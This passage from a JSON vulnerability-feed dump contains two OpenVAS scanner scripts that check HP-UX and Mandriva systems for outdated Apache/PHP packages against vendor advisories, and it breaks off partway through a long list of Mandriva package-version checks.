"http://plugins.openvas.org/nasl.php?oid=835236", "type": "openvas", "title": "HP-UX Update for Apache with PHP HPSBUX02543", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Apache with PHP HPSBUX02543\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote Denial of Service (DoS)\n unauthorized Access\n cross site scripting (XSS).\";\ntag_affected = \"Apache with PHP on\n HP-UX B.11.11, B.11.23, B.11.31 running Apache with PHP v5.2.6 or earlier.\";\ntag_insight = \"Potential security vulnerabilities have been identified with HP-UX running \n Apache with PHP. These vulnerabilities could be exploited remotely to create \n a Denial of Service (DoS) gain unauthorized access, and perform cross site \n scripting (XSS).\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02247738\");\n script_id(835236);\n script_version(\"$Revision: 8205 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-21 07:30:37 +0100 (Thu, 21 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-23 12:17:53 +0200 (Wed, 23 Jun 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"HPSBUX\", value: \"02543\");\n script_cve_id(\"CVE-2009-2687\", \"CVE-2009-3291\", \"CVE-2009-3292\", \"CVE-2009-3293\", \"CVE-2009-3557\", \"CVE-2009-4017\", \"CVE-2009-4018\", \"CVE-2009-4142\", \"CVE-2009-4143\");\n script_name(\"HP-UX Update for Apache with PHP HPSBUX02543\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of Apache with PHP\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.31\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.PHP\", revision:\"B.2.0.59.16\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.PHP2\", revision:\"B.2.0.59.16\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP\", revision:\"B.2.0.59.16\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP2\", revision:\"B.2.0.59.16\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APCH32.PHP\", revision:\"B.2.2.8.10\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APCH32.PHP2\", revision:\"B.2.2.8.10\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APACHE.PHP\", revision:\"B.2.2.8.10\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APACHE.PHP2\", revision:\"B.2.2.8.10\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.PHP\", revision:\"B.2.0.59.16\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.PHP2\", revision:\"B.2.0.59.16\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP\", revision:\"B.2.0.59.16\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP2\", revision:\"B.2.0.59.16\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APCH32.PHP\", revision:\"B.2.2.8.10\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APCH32.PHP2\", revision:\"B.2.2.8.10\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APACHE.PHP\", revision:\"B.2.2.8.10\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APACHE.PHP2\", revision:\"B.2.2.8.10\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.PHP\", revision:\"B.2.0.59.16\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.PHP2\", revision:\"B.2.0.59.16\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP\", revision:\"B.2.0.59.16\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP2\", revision:\"B.2.0.59.16\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3292", "CVE-2008-7068", "CVE-2009-3291", "CVE-2009-3293"], "description": "The remote host is missing an update to php\nannounced via advisory MDVSA-2009:247.", "modified": "2018-04-06T00:00:00", "published": "2009-09-28T00:00:00", "id": "OPENVAS:136141256231064959", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064959", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:247 (php)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_247.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:247 (php)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities was discovered and corrected in php:\n\nThe dba_replace function in PHP 5.2.6 and 4.x allows context-dependent\nattackers to cause a denial of service (file truncation) via a key with\nthe NULL byte. NOTE: this might only be a vulnerability in limited\ncircumstances in which the attacker can modify or add database entries\nbut does not have permissions to truncate the file (CVE-2008-7068).\n\nThe php_openssl_apply_verification_policy function in PHP before\n5.2.11 does not properly perform certificate validation, which has\nunknown impact and attack vectors, probably related to an ability to\nspoof certificates (CVE-2009-3291).\n\nUnspecified vulnerability in PHP before 5.2.11 has unknown impact\nand attack vectors related to missing sanity checks around exif\nprocessing. (CVE-2009-3292)\n\nUnspecified vulnerability in the imagecolortransparent function in\nPHP before 5.2.11 has unknown impact and attack vectors related to an\nincorrect sanity check for the color index. (CVE-2009-3293). However\nin Mandriva we don't use the bundled libgd source in php per default,\nthere is a unsupported package in contrib named php-gd-bundled that\neventually will get updated to pickup these fixes.\n\nThis update provides a solution to these vulnerabilities.\n\nAffected: 2008.1, 2009.0, Enterprise Server 5.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:247\";\ntag_summary = \"The remote host is missing an update to php\nannounced via advisory MDVSA-2009:247.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64959\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-28 19:09:13 +0200 (Mon, 28 Sep 2009)\");\n script_cve_id(\"CVE-2008-7068\", \"CVE-2009-3291\", \"CVE-2009-3292\", \"CVE-2009-3293\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:247 (php)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libphp5_common5\", rpm:\"libphp5_common5~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-bcmath\", rpm:\"php-bcmath~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-bz2\", rpm:\"php-bz2~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-calendar\", rpm:\"php-calendar~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ctype\", rpm:\"php-ctype~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-curl\", rpm:\"php-curl~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dba\", rpm:\"php-dba~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dbase\", rpm:\"php-dbase~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dom\", rpm:\"php-dom~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-exif\", rpm:\"php-exif~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-fcgi\", rpm:\"php-fcgi~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-filter\", rpm:\"php-filter~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ftp\", rpm:\"php-ftp~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gettext\", rpm:\"php-gettext~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gmp\", rpm:\"php-gmp~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-hash\", rpm:\"php-hash~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-iconv\", rpm:\"php-iconv~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-json\", rpm:\"php-json~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mcrypt\", rpm:\"php-mcrypt~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mhash\", rpm:\"php-mhash~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mime_magic\", rpm:\"php-mime_magic~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ming\", rpm:\"php-ming~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mssql\", rpm:\"php-mssql~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysqli\", rpm:\"php-mysqli~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-openssl\", rpm:\"php-openssl~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pcntl\", rpm:\"php-pcntl~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_dblib\", rpm:\"php-pdo_dblib~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_mysql\", rpm:\"php-pdo_mysql~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_odbc\", rpm:\"php-pdo_odbc~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_pgsql\", rpm:\"php-pdo_pgsql~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_sqlite\", rpm:\"php-pdo_sqlite~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-posix\", rpm:\"php-posix~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pspell\", rpm:\"php-pspell~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-readline\", rpm:\"php-readline~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-recode\", rpm:\"php-recode~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-session\", rpm:\"php-session~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-shmop\", rpm:\"php-shmop~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sockets\", rpm:\"php-sockets~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sqlite\", rpm:\"php-sqlite~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvmsg\", rpm:\"php-sysvmsg~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvsem\", rpm:\"php-sysvsem~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvshm\", rpm:\"php-sysvshm~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-tidy\", rpm:\"php-tidy~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-tokenizer\", rpm:\"php-tokenizer~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-wddx\", rpm:\"php-wddx~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlreader\", rpm:\"php-xmlreader~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlwriter\", rpm:\"php-xmlwriter~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xsl\", rpm:\"php-xsl~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-zlib\", rpm:\"php-zlib~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64php5_common5\", rpm:\"lib64php5_common5~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libphp5_common5\", rpm:\"libphp5_common5~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-bcmath\", rpm:\"php-bcmath~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-bz2\", rpm:\"php-bz2~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-calendar\", rpm:\"php-calendar~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ctype\", rpm:\"php-ctype~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-curl\", rpm:\"php-curl~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dba\", rpm:\"php-dba~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dbase\", rpm:\"php-dbase~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dom\", rpm:\"php-dom~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-exif\", rpm:\"php-exif~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-fcgi\", rpm:\"php-fcgi~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-filter\", rpm:\"php-filter~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ftp\", rpm:\"php-ftp~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gettext\", rpm:\"php-gettext~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gmp\", rpm:\"php-gmp~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-hash\", rpm:\"php-hash~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-iconv\", rpm:\"php-iconv~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-json\", rpm:\"php-json~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mcrypt\", rpm:\"php-mcrypt~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mhash\", rpm:\"php-mhash~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mime_magic\", rpm:\"php-mime_magic~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ming\", rpm:\"php-ming~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mssql\", rpm:\"php-mssql~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysqli\", rpm:\"php-mysqli~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ncurses\", 